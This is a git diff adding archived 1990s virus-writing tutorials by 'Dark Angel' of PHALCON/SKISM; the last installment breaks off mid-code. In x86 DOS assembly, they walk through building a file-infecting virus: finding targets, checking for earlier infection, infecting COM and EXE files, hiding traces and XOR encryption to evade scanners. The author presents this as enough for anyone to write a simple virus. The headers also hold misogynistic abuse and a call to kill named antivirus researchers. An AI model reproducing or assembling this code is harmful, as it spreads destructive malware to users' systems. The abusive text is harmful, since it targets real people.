+   | Program     | + |Virus| = |Virus|am     |
+   +-------------+   +-----+   +-------------+
+
+These virii are simple little hacks, but pretty worthless because of their
+easy detectability.  Enuff said!
+
+-=-=-=-=-=-=-=-=-=-=-=-=-
+WELL, THAT JUST ABOUT...
+-=-=-=-=-=-=-=-=-=-=-=-=-
+wraps it  up for  this installment  of Dark  Angel's Phunky  virus  writing
+guide.   There will (hopefully) be future issues where I discuss more about
+virii and  include much  more source  code (mo' source!).  Till then, happy
+coding!
+
+Downloaded From P-80 International Information Systems 304-744-2253
diff --git a/textfiles.com/virus/ps_vir2.vir b/textfiles.com/virus/ps_vir2.vir
new file mode 100644
index 00000000..d4f13307
--- /dev/null
+++ b/textfiles.com/virus/ps_vir2.vir
@@ -0,0 +1,596 @@
+      //==//  //  //  /||      //      //====  //==//  //|   //
+     //  //  //  //  //||     //      //      //  //  //||  //
+    //==//  //==//  //=||    //      //      //  //  // || //
+   //      //  //  //  ||   //      //      //  //  //  ||//
+  //      //  //  //   ||  //====  //====  //==//  //   ||/
+  
+     /====   // //     //  /====   /|   /|
+    //      // //     //  //      //|  //|
+    ===\   // //     //   ===\   //|| //||
+      //  //  \\    //      //  // ||// ||
+  ====/  //    \\  //   ====/  //  ||/  ||
+  
+  ����������������������������������������������
+  DISCLAIMER: Pretend you see a disclaimer here.
+    99.44% of the code guaranteed to work.
+  ����������������������������������������������
+  DEDICATION: Please try your best to kill those
+    who made this possible, especially that dumb
+    bitch who doesn't know her own name (Patty),
+    and her lover Ross M. Greenberg.
+  ����������������������������������������������
+  GREETS -N- STUFF: Greets go to all the members
+    of PHALCON/SKISM.  I wish to give buckets o'
+    thanks to Hellraiser, Garbageheap, and Demo-
+    gorgon.  No thanks this time to Orion Rouge,
+    the godly master of idiocy.
+  ����������������������������������������������
+  
+  Dark Angel's Chunky Virus Writing Guide
+  ���� ������� ������ ����� ������� �����
+  
+  �������������������������������
+  INSTALLMENT II:  THE REPLICATOR
+  �������������������������������
+  
+  In the  last installment of my Virus Writing Guide, I explained the various
+  parts of  a virus  and went  into a  brief discussion  about each.  In this
+  issue, I  shall devote  all my  attention towards the replicator portion of
+  the virus.  I promised code and code I shall present.
+  
+  However, I  shall digress  for a moment because it has come to my attention
+  that some  mutant  copies  of  the  first  installment  were  inadvertently
+  released.   These copies  did not  contain a  vital section  concerning the
+  calculation of offsets.
+  
+  You never  know where  your variables  and code  are going  to wind  up  in
+  memory.   If you think a bit, this should be pretty obvious.  Since you are
+  attaching the  virus to  the end  of a  program, the  location in memory is
+  going to  be changed,  i.e. it  will be  larger by the size of the infected
+  program.   So, to  compensate, we  must take  the change in offset from the
+  original virus,  or the  delta offset,  and add  that to  all references to
+  variables.
+  
+  Instructions that  use displacement,  i.e. relative  offsets, need  not  be
+  changed.   These instructions are the JA, JB, JZ class of instructions, JMP
+  SHORT, JMP label, and CALL.  Thus, whenever possible use these in favor of,
+  say, JMP FAR PTR.
+  
+  Suppose in  the following  examples, si  is somehow  loaded with  the delta
+  offset.
+  
+  Replace
+    mov ax, counter
+  With
+    mov ax, word ptr [si+offset counter]
+  
+  Replace
+    mov dx, offset message
+  With
+    lea dx, [si+offset message]
+  
+  You may  be asking, "how the farg am I supposed to find the delta offset!?"
+  It is simple enough:
+  
+    call setup
+  setup:
+    pop  si
+    sub  si, offset setup
+  
+  An explanation  of the  above fragment  is in order.  CALL setup pushes the
+  location of the next instruction, i.e. offset setup, onto the stack.  Next,
+  this location  is POPed  into si.   Finally,  the ORIGINAL  offset of setup
+  (calculated at  compile-time) is  subtracted from  si, giving you the delta
+  offset.   In the  original virus,  the delta offset will be 0, i.e. the new
+  location of setup equals the old location of setup.
+  
+  It is  often preferable to use bp as your delta offset, since si is used in
+  string instructions.  Use whichever you like.  I'll randomly switch between
+  the two as suits my mood.
+  
+  Now back to the other stuff...
+  
+  A biological  virus is a parasitic "organism" which uses its host to spread
+  itself.   It must keep the host alive to keep itself "alive."  Only when it
+  has spread  everywhere will  the host  die a  painful, horrible death.  The
+  modern electronic  virus is  no different.   It  attaches itself  to a host
+  system and  reproduces until the entire system is fucked.  It then proceeds
+  and neatly wrecks the system of the dimwit who caught the virus.
+  
+  Replication is  what distinguishes  a virus  from a simple trojan.  Anybody
+  can write  a trojan,  but a  virus is  much more  elegant.   It acts almost
+  invisibly, and  catches the victim off-guard when it finally surfaces.  The
+  first question  is, of  course, how  does a virus spread?  Both COM and EXE
+  infections (along with sample infection routines) shall be presented.
+  
+  There are  two major  approaches to  virii: runtime and TSR.  Runtime virii
+  infect, yup,  you guessed  it, when  the infected program is run, while TSR
+  virii go  resident  when  the  infected  programs  are  run  and  hook  the
+  interrupts and  infect when  a file  is  run,  open,  closed,  and/or  upon
+  termination (i.e.  INT  20h,  INT  21h/41h).    There  are  advantages  and
+  disadvantages to  each.   Runtime virii  are harder to detect as they don't
+  show up on memory maps, but, on the other hand, the delay while it searches
+  for and  infects a file may give it away.  TSR virii, if not properly done,
+  can be  easily spotted  by utilities such as MAPMEM, PMAP, etc, but are, in
+  general, smaller  since they  don't need  a function to search for files to
+  infect.   They are  also faster than runtime virii, also because they don't
+  have to  search for files to infect.  I shall cover runtime virii here, and
+  TSR virii in a later installment.
+  
+  Here is a summary of the infection procedure:
+       1) Find a file to infect.
+       2) Check if it meets the infection criteria.
+       3) See if it is already infected and if so, go back to 1.
+       4) Otherwise, infect the file.
+       5) Cover your tracks.
+  
+  I shall  go through  each of  these steps and present sample code for each.
+  Note that  although a  complete virus  can be  built from  the  information
+  below, you  cannot merely  rip the  code out  and stick it together, as the
+  fragments are  from various  different virii that I have written.  You must
+  be somewhat  familiar with assembly.  I present code fragments; it is up to
+  you to either use them as examples or modify them for your own virii.
+  
+  ������������������������������
+  STEP 1 - FIND A FILE TO INFECT
+  ������������������������������
+  Before you  can infect  a file,  you have  to find it first!  This can be a
+  bottleneck in  the performance  of the  virus, so  it  should  be  done  as
+  efficiently as possible.  For runtime virii, there are a few possibilities.
+  You could  infect files in only the current directory, or you could write a
+  directory traversal function to infect files in ALL directories (only a few
+  files per  run, of  course), or you could infect files in only a few select
+  directories.   Why would  you choose  to only  infect files  in the current
+  directory?   It would  appear to  limit the  efficacy  of  the  infections.
+  However, this  is done  in some  virii either  to speed  up the virus or to
+  shorten the code size.
+  
+  Here is a directory traversal function.  It uses recursion, so it is rather
+  slow, but it does the job.  This was excerpted with some modifications from
+  The Funky Bob Ross Virus [Beta].
+  
+  traverse_fcn proc    near
+          push    bp                      ; Create stack frame
+          mov     bp,sp
+          sub     sp,44                   ; Allocate space for DTA
+  
+          call    infect_directory        ; Go to search & destroy routines
+  
+          mov     ah,1Ah                  ;Set DTA
+          lea     dx,word ptr [bp-44]     ; to space allotted
+          int     21h                     ;Do it now!
+  
+          mov     ah, 4Eh                 ;Find first
+          mov     cx,16                   ;Directory mask
+          lea     dx,[si+offset dir_mask] ; *.*
+          int     21h
+          jmp     short isdirok
+  gonow:
+          cmp     byte ptr [bp-14], '.'   ; Is first char == '.'?
+          je      short donext            ; If so, loop again
+          lea     dx,word ptr [bp-14]     ; else load dirname
+          mov     ah,3Bh                  ; and changedir there
+          int     21h
+          jc      short donext              ; Do next if invalid
+          inc     word ptr [si+offset nest] ; nest++
+          call    near ptr traverse_fcn     ; recurse directory
+  donext:
+          lea     dx,word ptr [bp-44]     ; Load space allocated for DTA
+          mov     ah,1Ah                  ; and set DTA to this new area
+          int     21h                     ; 'cause it might have changed
+  
+          mov     ah,4Fh                  ;Find next
+          int     21h
+  isdirok:
+          jnc     gonow                   ; If OK, jmp elsewhere
+          cmp     word ptr [si+offset nest], 0 ; If root directory
+                                               ;  (nest == 0)
+          jle     short cleanup                ; then Quit
+          dec     word ptr [si+offset nest]    ; Else decrement nest
+          lea     dx, [si+offset back_dir]; '..'
+          mov     ah,3Bh                  ; Change directory
+          int     21h                     ; to previous one
+  cleanup:
+          mov     sp,bp
+          pop     bp
+          ret
+  traverse_fcn endp
+  
+  ; Variables
+  nest     dw     0
+  back_dir db     '..',0
+  dir_mask db     '*.*',0
+  
+  The code  is self-explanatory.   Make  sure  you  have  a  function  called
+  infect_directory which scans the directory for possible files to infect and
+  makes sure  it doesn't  infect already-infected  files.   This function, in
+  turn, calls infect_file which infects the file.
+  
+  Note, as  I said  before, this  is slow.   A  quicker method, albeit not as
+  global, is  the "dot  dot" method.   Hellraiser  showed me this neat little
+  trick.   Basically, you  keep searching  each directory and, if you haven't
+  infected enough,  go to the previous directory (dot dot) and try again, and
+  so on.  The code is simple.
+  
+  dir_loopy:
+          call    infect_directory
+          lea     dx, [bp+dotdot]
+          mov     ah, 3bh                 ; CHDIR
+          int     21h
+          jnc     dir_loopy               ; Carry set if in root
+  
+  ; Variables
+  dotdot  db      '..',0
+  
+  Now you  must find a file to infect.  This is done (in the fragments above)
+  by a  function called infect_directory.  This function  calls FINDFIRST and
+  FINDNEXT a  couple of  times to find files to infect.  You should first set
+  up a  new DTA.  NEVER use the DTA in the PSP (at 80h) because altering that
+  will affect  the command-line  parameters  of  the  infected  program  when
+  control is returned to it.  This is easily done with the following:
+  
+          mov     ah, 1Ah                 ; Set DTA
+          lea     dx, [bp+offset DTA]     ; to variable called DTA (wow!)
+          int     21h
+  
+  Where DTA  is a 42-byte chunk of memory.  Next, issue a series of FINDFIRST
+  and FINDNEXT calls:
+  
+          mov     ah, 4Eh                 ; Find first file
+          mov     cx, 0007h               ; Any file attribute
+          lea    dx, [bp+offset file_mask]; DS:[DX] --> filemask
+          int     21h
+          jc      none_found
+  found_another:
+          call    check_infection
+          mov     ah, 4Fh                 ; Find next file
+          int     21h
+          jnc     found_another
+  none_found:
+  
+  Where file_mask  is DBed  to either '*.EXE',0 or '*.COM',0.  Alternatively,
+  you could FINDFIRST for '*.*',0 and check if the extension is EXE or COM.
+  
+  ����������������������������������������
+  STEP 2 - CHECK VERSUS INFECTION CRITERIA
+  ����������������������������������������
+  Your virus  should be  judicious in  its infection.  For example, you might
+  not want  to  infect  COMMAND.COM,  since  some  programs  (i.e.  the  puny
+  FluShot+) check its CRC or checksum on runtime.  Perhaps you do not wish to
+  infect the  first valid file in the directory.  Ambulance Car is an example
+  of such  a virus.   Regardless,  if there  is some  infection criteria, you
+  should check  for it  now.   Here's example  code checking  if the last two
+  letters are 'ND', a simple check for COMMAND.COM:
+  
+          cmp     word ptr [bp+offset DTA+35], 'DN'  ; Reverse word order
+          jz      fail_check
+  
+  �������������������������������������
+  STEP 3 - CHECK FOR PREVIOUS INFECTION
+  �������������������������������������
+  Every virus has certain characteristics with which you can identify whether
+  a file  is infected  already.   For example,  a certain  piece of  code may
+  always occur  in a  predictable place.   Or  perhaps the JMP instruction is
+  always coded  in the  same manner.   Regardless,  you should make sure your
+  virus has  a marker  so that  multiple infections  of the  same file do not
+  occur.  Here's an example of one such check (for a COM file infector):
+  
+          mov     ah,3Fh                          ; Read first three
+          mov     cx, 3                           ; bytes of the file
+          lea     dx, [bp+offset buffer]          ; to the buffer
+          int     21h
+  
+          mov     ax, 4202h                       ; SEEK from EOF
+          xor     cx, cx                          ; DX:CX = offset
+          xor     dx, dx                          ; Returns filesize
+          int     21h                             ; in DX:AX
+  
+          sub     ax, virus_size + 3
+          cmp     word ptr [bp+offset buffer+1], ax
+          jnz     infect_it
+  
+  bomb_out:
+          mov     ah, 3Eh                         ; else close the file
+          int     21h                             ;  and go find another
+  
+  In this  example, BX  is assumed to hold a file handle to the program to be
+  checked for  infection and virus_size equals the size of the virus.  Buffer
+  is assumed  to be  a three-byte  area of  empty space.   This code fragment
+  reads the  first three bytes into buffer and then compares the JMP location
+  (located in  the word  beginning at  buffer+1) to  the filesize  If the JMP
+  points to  virus_size bytes  before the  EOF,  then  the  file  is  already
+  infected with  this virus.   Another method would be to search at a certain
+  location in the file for a marker byte or word.  For example:
+  
+          mov     ah, 3Fh                         ; Read the first four
+          mov     cx, 4                           ; bytes of the file into
+          lea     dx, [bp+offset buffer]          ; the buffer.
+          int     21h
+  
+          cmp     byte ptr [buffer+3], infection_id_byte ; Check the fourth
+          jz      bomb_out                        ; byte for the marker
+  infect_it:
+  
+  ������������������������
+  STEP 4 - INFECT THE FILE
+  ������������������������
+  This is  the "guts"  of the  virus, the  heart of the replicator.  Once you
+  have located  a potential  file, you  must save the attributes, time, date,
+  and size for later use.  The following is a breakdown of the DTA:
+  
+    Offset     Size      What it is
+      0h       21 BYTES  Reserved, varies as per DOS version
+     15h       BYTE      File attribute
+     16h       WORD      File time
+     18h       WORD      File date
+     1Ah       DWORD     File size
+     1Eh       13 BYTES  ASCIIZ filename + extension
+  
+  As you can see, the DTA holds all the vital information about the file that
+  you need.  The following code fragment is a sample of how to save the info:
+  
+          lea  si, [bp+offset DTA+15h]            ; Start from attributes
+          mov  cx, 9                              ; Finish with size
+          lea  di, [bp+offset f_attr]             ; Move into your locations
+          rep  movsb
+  ; Variables needed
+  f_attr  db   ?
+  f_time  dw   ?
+  f_date  dw   ?
+  f_size  dd   ?
+  
+  You can  now change the file attributes to nothing through INT 21h/Function
+  43h/Subfunction 01h.   This  is to  allow infection  of system, hidden, and
+  read only  files.   Only primitive  (or minimal)  virii cannot  handle such
+  files.
+  
+          lea  dx, [bp+offset DTA+1eh]            ; DX points to filename in
+          mov  ax, 4301h                          ; DTA
+          xor  cx, cx                             ; Clear file attributes
+          int  21h                                ; Issue the call
+  
+  Once the  attributes have  been annihilated,  you may  open the  file  with
+  callous impunity.  Use a handle open in read/write mode.
+  
+          lea  dx, [bp+offset DTA+1eh]            ; Use filename in DTA
+          mov  ax, 3d02h                          ; Open read/write mode
+          int  21h                                ; duh.
+          xchg ax, bx                             ; Handle is more useful in
+                                                  ; BX
+  
+  Now we come to the part you've all been waiting for: the infection routine.
+  I am  pleased to present code which will handle the infection of COM files.
+  Yawn, you  say, I can already do that with the information presented in the
+  previous installment.   Ah,  but there  is more,  much more.   A sample EXE
+  infector shall also be presented shortly.
+  
+  The theory  behind COM  file infection was covered in the last installment,
+  so I shall not delve into the details again.  Here is a sample infector:
+  
+  ; Sample COM infector.  Assumes BX holds the file handle
+  ; Assume COM file passes infection criteria and not already infected
+          mov     ah, 3fh
+          lea     dx, [bp+buffer1]
+          mov     cx, 3
+          int     21h
+  
+          mov     ax, 4200h                       ; Move file pointer to
+          xor     cx, cx                          ; the beginning of the
+          xor     dx, dx                          ; file
+          int     21h
+  
+          mov     byte ptr [bp+buffer2], 0e9h      ; JMP
+          mov     ax, word ptr [bp+f_size]
+          sub     ax, part1_size                   ; Usually 3
+          mov     word ptr [bp+buffer2+1], ax      ; offset of JMP
+  
+  ; Encode JMP instruction to replace beginning of the file
+          mov     byte ptr [bp+buffer2], 0e9h      ; JMP
+          mov     ax, word ptr [bp+f_size]
+          sub     ax, part1_size                   ; Usually 3
+          mov     word ptr [bp+buffer2+1], ax      ; offset of JMP
+  
+  ; Write the JMP instruction to the beginning of the file
+          mov     ah, 40h                          ; Write CX bytes to
+          mov     cx, 3                            ; handle in BX from
+          lea     dx, [bp+buffer2]                 ; buffer -> DS:[DX]
+          int     21h
+  
+          mov     ax, 4202h                        ; Move file pointer to
+          xor     cx, cx                           ; end of file
+          xor     dx, dx
+          int     21h
+  
+          mov     ah, 40h                          ; Write CX bytes
+          mov     cx, endofvirus - startofpart2    ; Effective size of virus
+          lea     dx, [bp+startofpart2]            ; Begin write at start
+          int     21h
+  
+  ; Variables
+  buffer1 db 3 dup (?)                             ; Saved bytes from the
+                                                   ; infected file to restore
+                                                   ; later
+  buffer2 db 3 dup (?)                             ; Temp buffer
+  
+  After some  examination, this code will prove to be easy to understand.  It
+  starts by reading the first three bytes into a buffer.  Note that you could
+  have done  this in  an earlier  step, such  as when  you are checking for a
+  previous infection.   If  you have  already done  this, you obviously don't
+  need to  do it again.  This buffer must be stored in the virus so it can be
+  restored later when the code is executed.
+  
+  EXE infections  are also  simple, although  a  bit  harder  to  understand.
+  First, the thoery.  Here is the format of the EXE header:
+  
+   Ofs Name                Size      Comments
+   00  Signature           2 bytes   always 4Dh 5Ah (MZ)
+  *02  Last Page Size      1 word    number of bytes in last page
+  *04  File Pages          1 word    number of 512 byte pages
+   06  Reloc Items         1 word    number of entries in table
+   08  Header Paras        1 word    size of header in 16 byte paras
+   0A  MinAlloc            1 word    minimum memory required in paras
+   0C  MaxAlloc            1 word    maximum memory wanted in paras
+  *0E  PreReloc SS         1 word    offset in paras to stack segment
+  *10  Initial SP          1 word    starting SP value
+   12  Negative checksum   1 word    currently ignored
+  *14  Pre Reloc IP        1 word    execution start address
+  *16  Pre Reloc CS        1 word    preadjusted start segment
+   18  Reloc table offset  1 word    is offset from start of file)
+   1A  Overlay number      1 word    ignored if not overlay
+   1C  Reserved/unused     2 words
+  * denotes bytes which should be changed by the virus
+  
+  To understand  this, you  must first  realise that EXE files are structured
+  into segments.  These segments may begin and end anywhere.  All you have to
+  do to  infect an EXE file is tack on your code to the end.  It will then be
+  in its  own segment.  Now all you have to do is make the virus code execute
+  before the  program code.   Unlike  COM  infections,  no  program  code  is
+  overwritten, although  the header  is modified.   Note  the virus can still
+  have the  V1/V2 structure,  but only V2 needs to be concatenated to the end
+  of the infected EXE file.
+  
+  Offset 4  (File Pages)  holds the  size of the file divided by 512, rounded
+  up.   Offset 2 holds the size of the file modulo 512.  Offset 0Eh holds the
+  paragraph displacement  (relative to  the end of the header) of the initial
+  stack segment  and Offset 10h holds the displacement (relative to the start
+  of the  stack segment)  of the initial stack pointer.  Offset 16h holds the
+  paragraph displacement of the entry point relative to the end of the header
+  and offset  14h holds the displacement entry point relative to the start of
+  the entry  segment.   Offset 14h  and 16h are the key to adding the startup
+  code (the virus) to the file.
+  
+  Before you  infect the  file, you  should save the CS:IP and SS:SP found in
+  the EXE  header, as  you need  to restore  them upon  execution.  Note that
+  SS:SP is NOT stored in Intel reverse-double-word format.  If you don't know
+  what I'm  talking about, don't worry; it's only for very picky people.  You
+  should also save the file length as you will need to use that value several
+  times during  the infection  routine.   Now it's  time  to  calculate  some
+  offsets!   To find  the new  CS:IP and  SS:SP, use  the following code.  It
+  assumes the file size is loaded in DX:AX.
+  
+          mov     bx, word ptr [bp+ExeHead+8]    ; Header size in paragraphs
+               ;  ^---make sure you don't destroy the file handle
+          mov     cl, 4                          ; Multiply by 16.  Won't
+          shl     bx, cl                         ; work with headers > 4096
+                                                 ; bytes.  Oh well!
+          sub     ax, bx                         ; Subtract header size from
+          sbb     dx, 0                          ; file size
+    ; Now DX:AX is loaded with file size minus header size
+          mov     cx, 10h                        ; DX:AX/CX = AX Remainder DX
+          div     cx
+  
+  This code  is rather inefficient.  It would probably be easier to divide by
+  16 first  and then perform a straight subtraction from AX, but this happens
+  to be  the code  I chose.   Such is life. However, this code does have some
+  advantages over  the more  efficient one.   With this, you are certain that
+  the IP  (in DX)  will be under 15.  This allows the stack to be in the same
+  segment as the entry point, as long as the stack pointer is a large number.
+  
+  Now AX*16+DX  points to  the end  of code.  If the virus begins immediately
+  after the  end of the code, AX and DX can be used as the initial CS and IP,
+  respectively.   However, if  the virus  has some junk (code or data) before
+  the entry  point, add the entry point displacement to DX (no ADC with AX is
+  necessary since DX will always be small).
+  
+          mov     word ptr [bp+ExeHead+14h], dx  ; IP Offset
+          mov     word ptr [bp+ExeHead+16h], ax  ; CS Displacement in module
+  
+  The SP  and SS  can now  be calculated.   The  SS is  equal to the CS.  The
+  actual value  of the SP is irrelevant, as long as it is large enough so the
+  stack will  not overwrite code (remember: the stack grows downwards).  As a
+  general rule,  make sure the SP is at least 100 bytes larger than the virus
+  size.  This should be sufficient to avoid problems.
+  
+          mov     word ptr [bp+ExeHead+0Eh], ax  ; Paragraph disp. SS
+          mov     word ptr [bp+ExeHead+10h], 0A000h ; Starting SP
+  
+  All that  is left  to fiddle  in the  header is the file size.  Restore the
+  original file  size from  wherever you  saved it  to DX:AX.   To  calculate
+  DX:AX/512 and DX:AX MOD 512, use the following code:
+  
+          mov     cl, 9                           ; Use shifts again for
+          ror     dx, cl                          ; division
+          push    ax                              ; Need to use AX again
+          shr     ax, cl
+          adc     dx, ax                          ; pages in dx
+          pop     ax
+          and     ah, 1                           ; mod 512 in ax
+  
+          mov     word ptr [bp+ExeHead+4], dx     ; Fix-up the file size in
+          mov     word ptr [bp+ExeHead+2], ax     ; the EXE header.
+  
+  All that is left is writing back the EXE header and concatenating the virus
+  to the end of the file.  You want code?  You get code.
+  
+          mov     ah, 3fh                         ; BX holds handle
+          mov     cx, 18h                         ; Don't need entire header
+          lea     dx, [bp+ExeHead]
+          int     21h
+  
+          call    infectexe
+  
+          mov     ax, 4200h                       ; Rewind to beginning of
+          xor     cx, cx                          ; file
+          xor     dx, dx
+          int     21h
+  
+          mov     ah, 40h                         ; Write header back
+          mov     cx, 18h
+          lea     dx, [bp+ExeHead]
+          int     21h
+  
+          mov     ax, 4202h                       ; Go to end of file
+          xor     cx, cx
+          xor     dx, dx
+          int     21h
+  
+          mov     ah, 40h                         ; Note: Only need to write
+          mov     cx, part2size                   ;       part 2 of the virus
+          lea     dx, [bp+offset part2start]      ;      (Parts of virus
+          int     21h                             ;       defined in first
+                                                  ;       installment of
+                                                  ;       the guide)
+  
+  Note that this code alone is not sufficient to write a COM or EXE infector.
+  Code is also needed to transfer control back to the parent program.  The
+  information needed to do this shall be presented in the next installment.
+  In the meantime, you can try to figure it out on your own; just remember
+  that you must restore all that you changed.
+  
+  ��������������������������
+  STEP 5 - COVER YOUR TRACKS
+  ��������������������������
+  This step,  though simple  to do, is too easily neglected.  It is extremely
+  important, as a wary user will be alerted to the presence of a virus by any
+  unnecessary updates  to a  file.   In its  simplest form,  it involves  the
+  restoration of   file  attributes, time  and date.   This  is done with the
+  following:
+  
+          mov     ax, 5701h                      ; Set file time/date
+          mov     dx, word ptr [bp+f_date]       ; DX = date
+          mov     cx, word ptr [bp+f_time]       ; CX = time
+          int     21h
+  
+          mov     ah, 3eh                        ; Handle close file
+          int     21h
+  
+          mov     ax, 4301h                      ; Set attributes
+          lea     dx, [bp+offset DTA + 1Eh]      ; Filename still in DTA
+          xor     ch, ch
+          mov     cl, byte ptr [bp+f_attrib]     ; Attribute in CX
+          int     21h
+  
+  Remember also to restore the directory back to the original one if it
+  changed during the run of the virus.
+  
+  ��������������
+  WHAT'S TO COME
+  ��������������
+  I have been pleased with the tremendous response to the last installment of
+  the guide.   Next  time, I  shall cover  the rest  of the  virus as well as
+  various tips  and common tricks helpful in writing virii.  Until then, make
+  sure you  look for  40Hex, the  official PHALCON/SKISM  magazine, where  we
+  share tips and information pertinent to the virus community.
+  
+
+Downloaded From P-80 International Information Systems 304-744-2253
diff --git a/textfiles.com/virus/ps_vir3.vir b/textfiles.com/virus/ps_vir3.vir
new file mode 100644
index 00000000..6eff44b2
--- /dev/null
+++ b/textfiles.com/virus/ps_vir3.vir
@@ -0,0 +1,444 @@
+      //==//  //  //  /||      //      //====  //==//  //|   //
+     //  //  //  //  //||     //      //      //  //  //||  //
+    //==//  //==//  //=||    //      //      //  //  // || //
+   //      //  //  //  ||   //      //      //  //  //  ||//
+  //      //  //  //   ||  //====  //====  //==//  //   ||/
+  
+     /====   // //     //  /====   /|   /|
+    //      // //     //  //      //|  //|
+    ===\   // //     //   ===\   //|| //||
+      //  //  \\    //      //  // ||// ||
+  ====/  //    \\  //   ====/  //  ||/  ||
+  
+  �����������������������������������������������
+  DISCLAIMER: I hereby claim to have written this
+    file.
+  �����������������������������������������������
+  DEDICATION: This is dedicated to Patty Hoffman,
+    that fat bitch who doesn't know her own name,
+    and to the millions of dumb fools who were so
+    scared by Michelangelo that they didn't touch
+    their computers for an entire day.
+  �����������������������������������������������
+  GREETS: to all PHALCON/SKISM members especially
+    Garbageheap, Hellraiser, and Demogorgon.
+  �����������������������������������������������
+  
+  Dark Angel's Crunchy Virus Writing Guide
+  ���� ������� ������� ����� ������� �����
+       "It's the right thing to do"
+  
+  ��������������������������������������������
+  INSTALLMENT III:  NONRESIDENT VIRII, PART II
+  ��������������������������������������������
+  
+  Welcome to  the third  installment of  my Virus  Writing  Guide.    In  the
+  previous installment,  I covered  the primary  part  of  the  virus  -  the
+  replicator.   As promised,  I shall  now cover  the rest of the nonresident
+  virus and  present code  which, when  combined with  code from the previous
+  installment, will  be sufficient  to allow  anyone to write a simple virus.
+  Additionally, I  will present  a few  easy tricks  and tips  which can help
+  optimise your code.
+  
+  �������������
+  THE CONCEALER
+  �������������
+  The concealer  is the  most common  defense  virus  writers  use  to  avoid
+  detection of  virii.   The most common encryption/decryption routine by far
+  is the XOR, since it may be used for both encryption and decryption.
+  
+  encrypt_val   dw   ?   ; Should be somewhere in decrypted area
+  
+  decrypt:
+  encrypt:
+       mov dx, word ptr [bp+encrypt_val]
+       mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
+       lea si, [bp+part_to_encrypt_start]
+       mov di, si
+  
+  xor_loop:
+       lodsw
+       xor ax, dx
+       stosw
+       loop xor_loop
+  
+  The previous  routine uses  a simple XOR routine to encrypt or decrypt code
+  in memory.   This  is essentially  the same routine as the one in the first
+  installment, except  it encrypts words rather than bytes.  It therefore has
+  65,535 mutations  as opposed  to 255 and is also twice as fast.  While this
+  routine is  simple to  understand, it  leaves much  to be  desired as it is
+  large and therefore is almost begging to be a scan string.  A better method
+  follows:
+  
+  encrypt_val   dw    ?
+  
+  decrypt:
+  encrypt:
+       mov dx, word ptr [bp+encrypt_val]
+       lea bx, [bp+part_to_encrypt_start]
+       mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2
+  
+  xor_loop:
+       xor word ptr [bx], dx
+       add bx, 2
+       loop xor_loop
+  
+  Although this  code is  much shorter,  it is possible to further reduce its
+  size.   The best  method is  to insert the values for the encryption value,
+  BX, and CX, in at infection-time.
+  
+  decrypt:
+  encrypt:
+       mov bx, 0FFFFh
+       mov cx, 0FFFFh
+  
+  xor_loop:
+       xor word ptr [bx], 0FFFFh
+       add bx, 2
+       loop xor_loop
+  
+  All the  values denoted  by 0FFFFh  may be changed upon infection to values
+  appropriate for  the infected  file.  For example, BX should be loaded with
+  the offset  of part_to_encrypt_start  relative to the start of the infected
+  file when the encryption routine is written to the infected file.
+  
+  The primary  advantage of  the code  used above is the minimisation of scan
+  code length.   The scan code can only consist of those portions of the code
+  which remain  constant.   In this  case,  there  are  only  three  or  four
+  consecutive bytes  which remain  constant.   Since  the  entire  encryption
+  consist of only about a dozen bytes, the size of the scan code is extremely
+  tiny.
+  
+  Although the  function of  the encryption  routine is  clear,  perhaps  the
+  initial encryption  value and  calculation of  subsequent values  is not as
+  lucid.  The initial value for most XOR encryptions should be 0.  You should
+  change the  encryption value  during  the  infection  process.    A  random
+  encryption value  is desired.   The  simplest method  of obtaining a random
+  number is  to consult  to internal  clock.   A random  number may be easily
+  obtained with a simple:
+  
+          mov     ah, 2Ch                         ; Get me a random number.
+          int     21h
+          mov     word ptr [bp+encrypt_val], dx   ; Can also use CX
+  
+  Some encryption  functions do not facilitate an initial value of 0.  For an
+  example, take  a look  at Whale.  It uses the value of the previous word as
+  an encryption  value.   In these  cases, simply  use a JMP to skip past the
+  decryption routine  when coding  the virus.   However, make sure infections
+  JMP to  the right location!  For example, this is how you would code such a
+  virus:
+  
+          org     100h
+  
+  start:
+          jmp     past_encryption
+  
+  ; Insert your encryption routine here
+  
+  past_encryption:
+  
+  The encryption  routine is  the ONLY  part of  the virus  which needs to be
+  unencrypted.   Through code-moving  techniques, it  is possible to copy the
+  infection mechanism  to the  heap (memory location past the end of the file
+  and before  the stack).   All  that is required is a few MOVSW instructions
+  and one  JMP.   First the  encryption routine  must  be  copied,  then  the
+  writing, then  the decryption,  then the  RETurn back  to the program.  For
+  example:
+  
+       lea si, [bp+encryption_routine]
+       lea di, [bp+heap]
+       mov cx, encryption_routine_size
+       push si
+       push cx
+       rep movsb
+  
+       lea si, [bp+writing_routine]
+       mov cx, writing_routine_size
+       rep movsb
+  
+       pop cx
+       pop si
+       rep movsb
+  
+       mov al, 0C3h                             ; Tack on a near return
+       stosb
+  
+       call [bp+heap]
+  
+  Although most  virii, for  simplicity's sake, use the same routine for both
+  encryption  and  decryption,  the  above  code  shows  this  is  completely
+  unnecessary.   The only  modification of  the above code for inclusion of a
+  separate decryption  routine is to take out the PUSHes and replace the POPs
+  with the appropriate LEA si and MOV cx.
+  
+  Original encryption  routines, while  interesting, might  not be  the best.
+  Stolen encryption  routines are  the best,  especially  those  stolen  from
+  encrypted shareware  programs!   Sydex is notorious for using encryption in
+  their shareware  programs.   Take a  look at  a  shareware  program's  puny
+  encryption and  feel free  to copy  it into your own.  Hopefully, the anti-
+  viral developers  will create  a scan string which will detect infection by
+  your virus in shareware products simply because the encryption is the same.
+  
+  Note that  this is  not a  full treatment  of concealment routines.  A full
+  text file could be written on encryption/decryption techniques alone.  This
+  is only  the simplest  of all  possible encryption techniques and there are
+  far more  concealment techniques  available.  However, for the beginner, it
+  should suffice.
+  
+  ��������������
+  THE DISPATCHER
+  ��������������
+  The dispatcher  is the  portion of the virus which restores control back to
+  the infected  program.    The  dispatchers  for  EXE  and  COM  files  are,
+  naturally, different.
+  
+  In COM  files, you  must restore  the bytes  which were overwritten by your
+  virus and  then transfer  control back  to CS:100h,  which is where all COM
+  files are initially loaded.
+  
+  RestoreCOM:
+       mov di, 100h                     ; We are copying to the beginning
+       lea si, [bp+savebuffer]          ; We are copying from our buffer
+       push di                          ; Save offset for return (100h)
+       movsw                            ; Mo efficient than mov cx, 3, movsb
+       movsb                            ; Alter to meet your needs
+       retn                             ; A JMP will also work
+  
+  EXE files  require simply  the restoration of the stack segment/pointer and
+  the code segment/instruction pointer.
+  
+  ExeReturn:
+          mov     ax, es                           ; Start at PSP segment
